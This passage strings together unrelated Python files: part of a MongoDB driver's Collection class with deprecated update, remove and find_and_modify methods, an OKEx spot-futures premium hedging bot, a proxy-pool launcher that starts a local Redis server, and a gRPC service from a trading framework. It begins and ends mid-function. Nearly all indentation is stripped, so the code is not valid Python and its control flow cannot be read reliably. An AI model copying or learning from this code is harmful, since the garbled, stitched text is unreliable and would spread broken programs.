common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
collation=collation,
session=session, retryable_write=retryable_write,
user_fields=_FIND_AND_MODIFY_DOC_FIELDS)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
hedging.py
|
import json
import os
import queue
import threading
import asyncio
from copy import copy
import sys
import logging
import time
from multiprocessing import Queue
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
rootPath = os.path.split(rootPath)[0]
os.sys.path.append(rootPath)
from dquant.constants import Constants
from dquant.strategy.trigger import DepthIndexTrigger
from dquant.markets._okex_future_rest import OkexFutureRest
from dquant.markets._okex_future_ws import OkexFutureWs
from dquant.markets._okex_spot_ws_v2 import OkexSpotWs
from dquant.common.alarms import alarm_of_stock
logger = logging.getLogger("dquant")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
fh = logging.FileHandler('../../logs/OKEXHedging.log', mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
# config_name = "configHedging.json"
#config_name = "../strategy/configHedging.json"
q_msg = Queue()
class TakersWs(threading.Thread):
def __init__(self, mkt, meta_code, strategy_id, config_name="configHedging.json"):
super(TakersWs, self).__init__()
new = asyncio.new_event_loop()
asyncio.set_event_loop(new)
self.mkt = mkt(meta_code, loop=new)
self.mkt.strategy_id = strategy_id
self.mkt.trigger = True
self.base_coin = self.mkt.base_currency
self.target_coin = self.mkt.market_currency
self.minimum_amount = self.mkt.minimum_amount
self.name = self.mkt.name
self.fee_rate = self.mkt.fee_rate
self.q = queue.Queue()
self.q_output = queue.Queue()
self.mkt.setDaemon(True)
self.mkt.start()
self.c = 0
self.error_c = 0
self.accumulative_amount = 0
self.total_filled = 0
# queue status (whether this taker is accepting new tasks)
self.status = True
# exchange status: whether the exchange is available
self.available = True
self.config = json.load(open(config_name, 'r'))
self.max_task_on_do = self.config["max_task_on_do"]
self.minimum_amount = self.config[meta_code]["minimum_amount"]
self.taker_action = {"long": self.mkt_sell, "short": self.mkt_buy,
"sell": self.mkt_sell, "buy": self.mkt_buy}
def check_task_done(self):
task_on_do = self.q.qsize() + self.c
if not self.status or (not task_on_do and not self.accumulative_amount):
return True
else:
return False
def check_task_on_do(self):
if not self.status:
logger.warning("Blocking the thread")
task_on_do = self.q.qsize() + self.c
if task_on_do >= self.max_task_on_do:
logger.warning('Taker(%s) task on do: %s' % (self.name, task_on_do))
self.status = False
else:
self.status = True
def getDepth(self):
try:
depth = self.mkt.getDepth()
return depth
except TimeoutError:
self.available = False
return None
def parse_meta(self, meta_code):
self.mkt.parse_meta(meta_code)
def mkt_sell(self, total_price):
depth = self.getDepth()
ref_price = (depth['bids'][0]['price'] + depth['asks'][0]['price']) / 2
res = self.mkt.sell(amount=total_price/ref_price)
return res
def mkt_buy(self, total_price):
    depth = self.getDepth()
    ref_price = (depth['bids'][0]['price'] + depth['asks'][0]['price']) / 2
    # Mirror mkt_sell; assumes the spot market object exposes a buy()
    # counterpart to sell().
    res = self.mkt.buy(amount=total_price / ref_price)
    return res
def run(self):
while True:
self.check_task_on_do()
m = self.q.get()
side = m['side']
logger.debug('Taker get message: %s' % m)
total_price = float(m.get('total_price'))
# Pricing model: originally the best bid was used as the target price
# (amount = total_price / bid_price); the code below uses the bid/ask mid price.
depth = self.getDepth()
ref_price = (depth['bids'][0]['price'] + depth['asks'][0]['price']) / 2
amount_to_be_filled = total_price / ref_price + self.accumulative_amount
# Minimum order sizes: BTC >= 0.01, LTC >= 0.1, ETH >= 0.01
if amount_to_be_filled >= self.minimum_amount:
logger.info("Taker get message from maker: %s, real amount is %s." % (m, amount_to_be_filled))
result = None
self.c += 1
try:
result = self.taker_action[side](total_price)
logger.debug("Taker result: %s" % result)
if result and "order_id" in result:
order_id = result['order_id']
taker_side = "buy" if side == 'short' else "sell"
logger.info('Okex Spot: Taker order(%s) %s, total_price %s' % (order_id, taker_side, total_price))
self.accumulative_amount = 0
self.total_filled += total_price
self.q_output.put(result)
else:
logger.error('Okex Spot ERROR: %s' % result)
self.error_c += 1
self.q.put(m)
except Exception as ex:
logger.error('Okex Spot ERROR(%s): %s' % (ex, result))
self.error_c += 1
self.q.put(m)
finally:
self.c -= 1
# This taker has errored 5 or more times; bail out
if self.error_c >= 5:
logger.critical("Fatal Error: Taker %s seems not working properly, exit" % self.name)
self.q_output.put({})
self.status = False
break
else:
logger.info("%s is less than minimum amount: %s" % (amount_to_be_filled, self.minimum_amount))
# amount_to_be_filled already includes the previous accumulation,
# so assign instead of adding to avoid double counting
self.accumulative_amount = amount_to_be_filled
self.total_filled += total_price
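# A hedged sketch of how a maker feeds work to this taker; the message shape
# mirrors what run() reads above, and the meta_code value is hypothetical:
#
#   taker = OkexSpotWsTaker('okex_btc_usdt', strategy_id=1)
#   taker.q.put({'total_price': 200, 'side': 'long'})  # sell ~200 USD of spot
#   result = taker.q_output.get()                      # raw exchange response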
class OkexSpotWsTaker(TakersWs):
def __init__(self, meta_code, strategy_id):
super(OkexSpotWsTaker, self).__init__(OkexSpotWs, meta_code, strategy_id)
class Okex_Future(threading.Thread):
def __init__(self, meta_code, strategy_id):
super(Okex_Future, self).__init__()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.okex = OkexFutureWs(meta_code, self.loop)
self.name = self.okex.name
self.okex_rest = OkexFutureRest(meta_code)
self.okex.strategy_id = strategy_id
# self.q_trigger = self.okex.q_trigger
self.q_order_result = self.okex.q_order_result
self.okex.start()
self.last_get_order_info = {'order_id':None, 'amount_filled': None}
self.lastPosition = 0
self.q = queue.Queue()
self.q_output = queue.Queue()
self.order = [None, '']
self.order_id = None
self.side = ''
self.meta_code = meta_code
def reset(self):
self.order = [None, '']
self.order_id = None
self.side = ''
def get_latest_order(self, side):
# Query the buy/sell order history
hist = self.okex.getHist()
temp_hist = copy(hist)
# Iterate starting from the most recently filled / successfully cancelled order
latest_order_id, latest_order_details = temp_hist[side].popitem()
return {'order_id':latest_order_id, 'details': latest_order_details}
def my_getOrder(self, order_id):
# Look up the order and build the return value
order_details = self.okex.getOrder(order_id)
amount_filled = order_details['deal_amount']
amount_orig = order_details['amount']
price = order_details['price']
side = order_details['type']
ret = {'order_id': order_id, 'price': price, 'amount_filled': amount_filled, 'amount_orig': amount_orig, 'side': side}
return ret
def run(self):
while True:
m = self.q.get()
if m['type'] in ['Initial long order', 'Initial short order']:
q_msg.put({'meta_code': self.meta_code, 'type': m['type'].split(' ')[1]})
if m['type'] == 'Initial long order':
amount = m['amount']
future_depth = self.okex.getDepth()
future_bid_price = future_depth['bids'][0]['price']
result = self.okex.long(amount=amount, price=future_bid_price)
# self.order_id = result['order_id']
self.order = [result['order_id'], 'long']
logger.info('Long Order: id %s @%s' % (result['order_id'], future_bid_price))
self.q_output.put(result)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, result)
elif m['type'] == 'Initial short order':
amount = m['amount']
future_depth = self.okex.getDepth()
future_ask_price = future_depth['asks'][0]['price']
result = self.okex.short(amount=amount, price=future_ask_price)
# self.order_id = result['order_id']
self.order = [result['order_id'], 'short']
logger.info('Short Order: id %s @%s' % (result['order_id'], future_ask_price))
self.q_output.put(result)
elif m['type'] == 'Get order':
ret = self.my_getOrder(self.order[0])
# details = ret
order_id = ret['order_id']
amount_filled = ret['amount_filled']
amount_orig = ret['amount_orig']
if amount_orig:
self.lastPosition = amount_orig - amount_filled
# Throttle logging: skip output if the data is the same as last time
last_id = self.last_get_order_info['order_id']
last_amount_filled = self.last_get_order_info['amount_filled']
if last_id != ret['order_id'] or last_amount_filled != amount_filled:
self.last_get_order_info['order_id'] = ret['order_id']
self.last_get_order_info['amount_filled'] = amount_filled
logger.info('GetOrder: id %s, filled: %s' % (ret['order_id'], amount_filled))
# Order can no longer be found: log the filled amount and break out of the loop
else:
try:
latest_executed_order = self.get_latest_order(side=self.order[1])
amount_filled = latest_executed_order['details']['deal_amount']
amount_orig = latest_executed_order['details']['amount']
amount_remain = amount_orig - amount_filled
self.lastPosition = amount_remain  # normally 0
logger.info('GetOrder: id %s, filled: %s' % (latest_executed_order['order_id'], amount_filled))
break
except Exception as ex:
logger.error('GetOrder: %s' % ex)
ret['amount_filled'] = amount_filled
self.q_output.put(ret)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, ret)
elif m['type'] == 'Delete and place new order':
ret = self.my_getOrder(self.order[0])
# Info for the new order to be placed
price = m['price']
side = m['side']
# Info for the order to be cancelled
order_id = ret['order_id']
# Cancel the order
# The order is not yet complete (its order id can still be looked up)
if order_id:
self.okex.deleteOrder(order_id)
result = self.okex.getOrder(order_id)
amount_filled = result['deal_amount']
amount_orig = result['amount']
# amount_remain = amount_orig - amount_filled
self.lastPosition = amount_orig - amount_filled
old_price = result['price']
logger.info('Delete: canceling order %s @%s, filled %s, last position: %s' % (order_id, old_price, amount_filled, self.lastPosition))
# The order has already completed
else:
latest_executed_order = self.get_latest_order(side='long')
amount_filled = latest_executed_order['details']['deal_amount']
amount_orig = latest_executed_order['details']['amount']
amount_remain = amount_orig - amount_filled
self.lastPosition = amount_remain  # normally 0
logger.info('Delete: id %s has been filled before deleted, amount: %s ' % (latest_executed_order['order_id'], amount_filled))
break
# Place a new order; the amount is what was left when the old order was cancelled
amount = self.lastPosition
if side == 'long':
res = self.okex.long(amount=amount, price=price)
else:
res = self.okex.short(amount=amount, price=price)
# self.order_id = res['order_id']
self.order[0] = res['order_id']
order = self.okex.getOrder(res['order_id'])
logger.info('Place order: %s: amount %s' % (order['order_id'], order['amount']))
message = {'type': 'Order new', 'order_id': order['order_id'], 'amount': order['amount']}
self.q_output.put(message)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, message)
elif m['type'] == 'Close order':
self.okex.deleteOrder(self.order[0])
if self.order[1] == 'long':
self.okex_rest.close_all_long_orders()
else:
self.okex_rest.close_all_short_orders()
class Hedging(threading.Thread):
def __init__(self, config_name="configHedging.json"):
super(Hedging, self).__init__()
self.config = json.load(open(config_name, 'r'))
self.meta_code_spot = self.config['meta_code_spot']
self.meta_code_future = self.config['meta_code_future']
self.initial_amount = self.config['initial_amount']
self.strategy_id = self.config['strategy_id']
self.trigger_amount = self.config['trigger_amount']
self.trigger_order_premium = self.config['trigger_order_premium']
self.trigger_close_premium = self.config['trigger_close_premium']
self.spot_mkt = None
self.future_mkt = None
self.generateObj()
self.no_task = False
self.reference_bid_price = None
self.order_record = {}
self.trigger = DepthIndexTrigger.Q_TRIGGER
self.depths = {self.spot_mkt.name: {}, self.future_mkt.name: {}}
self.makerThread = threading.Thread(target=self.maker)
self.makerThread.setDaemon(True)
self.makerThread.start()
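# A hedged example of the configHedging.json shape read by this class and by
# TakersWs (the keys come from the code above; all values are made up, and the
# spot meta_code key must match meta_code_spot):
#
#   {
#     "meta_code_spot": "okex_eth_usdt",
#     "meta_code_future": "okex_eth_quarter",
#     "initial_amount": 10,
#     "strategy_id": 1,
#     "trigger_amount": 2,
#     "trigger_order_premium": 0.01,
#     "trigger_close_premium": 0.002,
#     "max_task_on_do": 5,
#     "okex_eth_usdt": {"minimum_amount": 0.01}
#   }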
def generateObj(self):
self.spot_mkt = OkexSpotWsTaker(self.meta_code_spot, strategy_id=self.strategy_id)
self.spot_mkt.setDaemon(True)
self.spot_mkt.start()
self.future_mkt = Okex_Future(self.meta_code_future, strategy_id=self.strategy_id)
self.future_mkt.setDaemon(True)
self.future_mkt.start()
def _has_future_order(self):
    # Okex_Future.run tracks the order id in self.order, not self.order_id
    return self.future_mkt.order[0]
def get_amount_filled_and_orig(self):
amount_orig = 0
amount_filled = 0
if self.order_record:
for order_id, details in self.order_record.items():
amount_filled += details[0]
amount_orig += details[1]
return amount_filled, amount_orig
def run(self):
count = 0
# When trigger_amount futures contracts are filled, trigger a spot buy/sell of
# BTC worth trigger_amount * 100 USD
# trigger_amount = 1
while True:
# Order-update messages drive the strategy
# message = {'order_id': order_id,'amount_orig': amount,'amount_filled': deal_amount,'message_type': 'order update'}
message = self.future_mkt.q_order_result.get()
# print(message)
if not self.future_mkt.order[0]:
continue
self.order_record.update({message['order_id']: [message['amount_filled'], message['amount_orig']]})
# self.last_order['order_id'] = message
side = message['side']
amount_filled, amount_orig = self.get_amount_filled_and_orig()
amount_remain = amount_orig - amount_filled
# If the remaining amount is below the taker's minimum trade size, wait until
# the order is completely filled
if side == "long":
reference_price = self.depths[self.spot_mkt.name]['bids'][0]['price']
else:
reference_price = self.depths[self.spot_mkt.name]['asks'][0]['price']
if amount_remain and amount_remain * 100 / reference_price < self.spot_mkt.minimum_amount:
logger.info("Future amount_remain: %s" % amount_remain)
continue
# If the order amount can no longer trigger the strategy, raise an AssertionError
# assert self.trigger_amount * count <= amount_orig
if amount_filled >= self.trigger_amount:
# If 5 contracts fill at once and the trigger is 2, trigger 2x the spot sell;
# since the fill amount is cumulative, subtract what has already been triggered
times = amount_filled // self.trigger_amount - count
# BTC contracts are 100 USD each, ETH contracts are 10 USD each
# number of triggers * amount sold per trigger * 100
total_price = times * self.trigger_amount * 100
self.spot_mkt.q.put({'total_price': total_price, "side": side})
count = amount_filled // self.trigger_amount
# self.spot_mkt.q_output.get()
if amount_filled == amount_orig:
logger.info('The order has done')
while True:
logger.debug("check_task_done:%s; total_filled: %s, initial: %s" % (self.spot_mkt.check_task_done(), self.spot_mkt.total_filled, self.initial_amount))
if (self.spot_mkt.check_task_done() and self.spot_mkt.total_filled == self.initial_amount*100) or not self.spot_mkt.status:
self.no_task = True
time.sleep(1)
def close_contract(self):
pass
def maker(self):
# self.future_mkt.q.put({'type': 'Initial long order', 'amount': self.initial_amount})
# self.future_mkt.q_output.get()
while True:
# Futures depth / futures index / spot depth updates drive the strategy
# message = {"asks": list_of_ask, 'bids': list_of_bid, "name": self.name}
# message = self.future_mkt.q_trigger.get()
message = self.trigger.get()
# Update the depth table
self.depths[message["name"]] = message
# Proceed only once the futures index, futures depth and spot depth have all arrived
if len(self.depths) < 3:
logger.info("Got market info from %s, %s/3" % (self.depths.keys(), len(self.depths)))
continue
# Compute the futures premium/discount (a worked numeric example follows this method)
index = self.depths["{}_index".format(self.future_mkt.name)]["futureIndex"]
future_bid0 = self.depths[self.future_mkt.name]['bids'][0]['price']
future_ask0 = self.depths[self.future_mkt.name]['asks'][0]['price']
spot_bid0 = self.depths[self.spot_mkt.name]['bids'][0]['price']
spot_ask0 = self.depths[self.spot_mkt.name]['asks'][0]['price']
spot_price = (spot_bid0 + spot_ask0) / 2
premium = (index - spot_price) / spot_price
print("premium: %s" % premium)
# self.reference_bid_price = float(message['bid_price'])
# print(message)
# No open futures order yet
if premium >= self.trigger_order_premium and not self._has_future_order():
logger.info("premium: %s" % premium)
# At a premium: short the future, go long spot
self.future_mkt.q.put({'type': 'Initial short order', 'amount': self.initial_amount})
self.future_mkt.q_output.get()
self.future_side = 'long'
logger.info("Open long position %s" % self.initial_amount)
elif premium <= - self.trigger_order_premium and not self._has_future_order():
logger.info("premium: %s" % premium)
# At a discount: long the future, go short spot
self.future_mkt.q.put({'type': 'Initial long order', 'amount': self.initial_amount})
self.future_mkt.q_output.get()
self.future_side = 'short'
logger.info("Open short position %s" % self.initial_amount)
# There is an open futures order
if - self.trigger_close_premium <= premium <= self.trigger_close_premium and self._has_future_order():
logger.info("premium: %s" % premium)
# Close the position
self.future_mkt.q.put({'type': 'Close order'})
self.future_mkt.q_output.get()
side = "buy" if self.future_mkt.order[1] == "long" else "sell"
amount_filled, amount_orig = self.get_amount_filled_and_orig()
total_price = amount_filled
self.spot_mkt.q.put({'total_price': total_price, "side": side})
self.future_mkt.reset()
logger.info("Close position.")
if not self._has_future_order():
continue
# Fetch the current order's status
self.future_mkt.q.put({'type': 'Get order'})
m = self.future_mkt.q_output.get()
my_price = m['price']
side = m['side']
if m['amount_orig'] == m['amount_filled']:
logger.info('The order has been filled')
break
if side == 'long':
# assert m['amount_filled'] < initial_amount
if my_price and future_bid0 > my_price:
amount = m['amount_orig'] - m['amount_filled']
self.future_mkt.q.put({'type': 'Delete and place new order', 'price': future_bid0, "side":side})
logger.info('Delete and place new order: Long %s @%s, past: @%s' % (amount, future_bid0, my_price))
self.future_mkt.q_output.get()
else:
if my_price and future_ask0 < my_price:
amount = m['amount_orig'] - m['amount_filled']
self.future_mkt.q.put({'type': 'Delete and place new order', 'price': future_ask0, "side":side})
logger.info('Delete and place new order: Short %s @%s, past: @%s' % (amount, future_ask0, my_price))
self.future_mkt.q_output.get()
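# Worked example of the premium trigger above (hedged; the numbers are made up):
# with futureIndex = 4120 and a spot mid price of (4000 + 4004) / 2 = 4002,
# premium = (4120 - 4002) / 4002 ≈ 0.0295. With trigger_order_premium = 0.01
# this opens a position (short futures / long spot), and the position is closed
# once |premium| falls back within trigger_close_premium.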
def create_hedging_process(amount, future_meta, spot_meta):
logger.info("Hedging Program get task: amount: %s, future: %s, spot: %s" % (amount, future_meta, spot_meta))
okexHedge = Hedging()
okexHedge.start()
# okexHedge.join()
while True:
if okexHedge.no_task:
logger.info('End of process')
sys.exit()
def hedge():
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
def hedge_eth():
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
def hAlarm():
msg = q_msg.get()
mtype = msg['type']
okex_rest = OkexFutureRest(msg['meta_code'])
okex_rest.start()
while True:
cur_bao = okex_rest.get_current_and_baocang_price()
success = alarm_of_stock(cur_bao['current_price'], cur_bao['baocang_price'], mtype)
if success:
print('Liquidation alarm sent. It is only reported once!')
break
if __name__ == "__main__":
os.environ[Constants.DQUANT_ENV] = "dev"
# tasks = [hAlarm, hedge]
#
# from multiprocessing import Pool
# p = Pool(2)
# for task in tasks:
# p.apply_async(task, args=())
# p.close()
# p.join()
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : main entry point
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
import subprocess
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run_redis_server():
subprocess.run(r"D:\program\Redis-x64-3.2.100\redis-server.exe",shell = True)
def run():
p_list = list()
p0 = Process(target=run_redis_server, name='run_redis_server')
p_list.append(p0)
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
server.py
|
import threading
import signal
from concurrent import futures
import queue
import abc
from functools import partial
import grpc
import click
from google.protobuf import empty_pb2 as emp
from pluto.interface.utils import paths, service_access
from pluto.interface import directory
from pluto.coms.utils import conversions
from pluto.control.controllable import commands
from pluto.control.events_log import events_log
from pluto.control.controllable.utils import io
from pluto.control.controllable.utils import factory
from protos import broker_pb2
from protos import controllable_pb2
from protos import controllable_pb2_grpc as cbl_rpc
from protos import interface_pb2_grpc as itf_rpc
from protos import interface_pb2 as itf
from protos.clock_pb2 import (
BAR,
TRADE_END)
class _StateStorage(object):
def __init__(self, storage_path, thread_pool):
'''
Parameters
----------
storage_path: str
thread_pool: concurrent.futures.ThreadPoolExecutor
'''
self._storage_path = storage_path
self._thread_pool = thread_pool
def _write(self, state):
# todo: should we append instead of over-writing?
with open(self._storage_path, 'wb') as f:
f.write(state)
def store(self, dt, controllable):
self._thread_pool.submit(partial(
self._write,
state=controllable.get_state(dt)))
def load_state(self):
with open(self._storage_path, 'rb') as f:
return f.read()
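# A hedged usage sketch of _StateStorage (the path is a placeholder):
#
#   pool = futures.ThreadPoolExecutor(1)
#   storage = _StateStorage('/tmp/live_state', pool)
#   storage.store(dt, controllable)   # serializes controllable.get_state(dt) off-thread
#   raw = storage.load_state()        # bytes written by the last store()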
class _NoStateStorage(object):
def store(self, dt, controllable):
pass
class FrequencyFilter(abc.ABC):
@abc.abstractmethod
def filter(self, evt_exc_pairs):
raise NotImplementedError
class DayFilter(FrequencyFilter):
def filter(self, evt_exc_pairs):
exchanges = []
for evt, exc in evt_exc_pairs:
if evt == TRADE_END:
exchanges.append(exc)
return exchanges
class MinuteFilter(FrequencyFilter):
def filter(self, evt_exc_pairs):
exchanges = []
for evt, exc in evt_exc_pairs:
if evt == TRADE_END or evt == BAR:
exchanges.append(exc)
return exchanges
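# A hedged sketch of how the frequency filters behave (exchange names are
# illustrative; BAR and TRADE_END come from protos.clock_pb2):
#
#   pairs = [(BAR, 'NYSE'), (TRADE_END, 'LSE')]
#   DayFilter().filter(pairs)     # -> ['LSE']
#   MinuteFilter().filter(pairs)  # -> ['NYSE', 'LSE']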
class _ServiceState(abc.ABC):
__slots__ = ['_service', '_controllable']
def __init__(self, service, controllable):
self._service = service
self._controllable = controllable
def execute(self, command):
self._execute(self._service, command, self._controllable)
@abc.abstractmethod
def _execute(self, service, command, controllable):
raise NotImplementedError
class _Recovering(_ServiceState):
def _execute(self, service, command, controllable):
if command.dt <= controllable.current_dt:
# don't do anything if the signal has "expired" this might happen
# if the service receives signals while restoring state...
pass
else:
# set state to running since we're synchronized
service.state = service.ready
# set controllable run state to ready
controllable.run_state = controllable.ready
# execute command
command()
class _Ready(_ServiceState):
def _execute(self, service, command, controllable):
command()
class _NoneObserver(object):
def clear(self):
pass
def update(self, performance, end):
pass
def stream(self):
pass
class _Observer(object):
def __init__(self, monitor_stub, file_path, session_id):
self._stub = monitor_stub
self._reload = True
self._file_path = file_path
self._session_id = session_id
def clear(self):
self._reload = True
def update(self, performance, end):
stub = self._stub
session_id = self._session_id
if self._reload == True:
self._stream(stub, session_id)
self._reload = False
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=performance,
session_id=session_id,
end=end))
def stream(self):
session_id = self._session_id
stub = self._stub
itr = iter(io.read_perf(self._file_path))
try:
n0 = next(itr)
while True:
try:
n1 = next(itr)
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=n0,
session_id=session_id))
n0 = n1
except StopIteration:
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=n0,
session_id=session_id,
end=True))
break
except StopIteration:
pass
# self._stream(self._stub, self._session_id)
def _stream(self, stub, session_id):
for packet in io.read_perf(self._file_path):
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=packet,
session_id=session_id))
class _PerformanceWriter(object):
# class for writing performance in some file...
# todo: need to write to session_id and execution mode (live, paper, simulation)
# live and paper cannot be over-written, only appended
# todo: the writer can make a call-back to some observers
# we also have a reader (which is a writer observer)
# the reader reads the performance in the file and waits for updates from the writer.
# the updates are read before getting written in the filesystem.
def __init__(self, session_id, monitor_stub, file_path, thread_pool):
'''
Parameters
----------
file_path: str
thread_pool: concurrent.futures.ThreadPoolExecutor
'''
self._path = file_path
self._thread_pool = thread_pool
self._none_observer = none = _NoneObserver()
self._observer = _Observer(monitor_stub, file_path, session_id)
self._current_observer = none
self._ended = False
self._lock = threading.Lock()
def _write(self, performance, end, path):
packet = conversions.to_proto_performance_packet(
performance).SerializeToString()
self._current_observer.update(packet, end)
io.write_perf(path, packet)
def performance_update(self, performance, end):
# todo: we need to do a non-blocking write using queues?
# self._thread_pool.submit(partial(
# self._write,
# performance=performance,
# end=end,
# path=self._path))
with self._lock:
self._write(performance, end, self._path)
self._ended = end
def observe(self):
with self._lock:
observer = self._observer
if self._ended == True:
self._thread_pool.submit(
observer.stream)
# observer.stream()
else:
#clear so that we can stream from the beginning
observer.clear()
self._current_observer = observer
def stop_observing(self):
with self._lock:
self._current_observer = self._none_observer
class ControllableService(cbl_rpc.ControllableServicer):
def __init__(self, monitor_stub, controllable_factory, sessions_interface):
'''
Parameters
----------
monitor_stub
controllable_factory
sessions_interface: pluto.interface.directory.StubDirectory
'''
self._perf_writer = None
self._stop = False
self._frequency_filter = None
# used for queueing commands
self._queue = queue.Queue()
self._thread = None
self._controllable = cbl = None
self._ready = _Ready(self, cbl)
self._recovery = recovery = _Recovering(self, cbl)
self._state = recovery
self._strategy_path = None
self._session_interface = sessions_interface
self._state_storage = _NoStateStorage()
self._root_dir = root = paths.get_dir('controllable')
self._states_dir = paths.get_dir('states', root)
self._thread_pool = futures.ThreadPoolExecutor(5)
self._monitor_stub = monitor_stub
self._cbl_fty = controllable_factory
@property
def frequency_filter(self):
return self._frequency_filter
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
def ready(self):
return self._ready
def recovering(self):
return self._recovery
# todo need to use an interceptor to check for tokens etc.
def stop(self):
pass
@service_access.framework_only
def Initialize(self, request, context):
with self._session_interface.read() as r:
id_ = request.id # the id of the controllable => will be used in performance updates
session = r.get_session(id_)
data_frequency = session.data_frequency
if data_frequency == 'daily':
self._frequency_filter = DayFilter()
elif data_frequency == 'minute':
self._frequency_filter = MinuteFilter()
mode = request.mode
controllable = self._cbl_fty.get_controllable(mode, id_)
# todo: we should have a directory for performance
# activate state storage if we're in live mode
# todo: it would be cleaner to have an utils file for common paths
perf_path = paths.get_file_path(
mode,
paths.get_dir(
id_,
paths.get_dir('strategies')))
if mode == 'live' or mode == 'paper':
self._state_storage = _StateStorage(
paths.get_file_path(
mode,
paths.get_dir(
id_,
self._states_dir)),
self._thread_pool)
else:
# clear file if we're in simulation mode
with open(perf_path, 'wb') as f:
f.truncate(0)
# todo: we need a monitor stub
self._perf_writer = _PerformanceWriter(
id_,
self._monitor_stub,
perf_path,  # perf_path is already a full file path built above
self._thread_pool
)
if controllable:
self._controllable = controllable
controllable.initialize(
id_,
conversions.to_datetime(request.start),
conversions.to_datetime(request.end),
session.universe_name,
session.get_strategy(r.get_strategy(session.strategy_id)),
request.capital,
request.max_leverage,
data_frequency,
mode,
session.look_back,
session.cancel_policy)
# run the thread
self._state = self._ready
self._thread = thread = threading.Thread(target=self._run)
thread.start()
else:
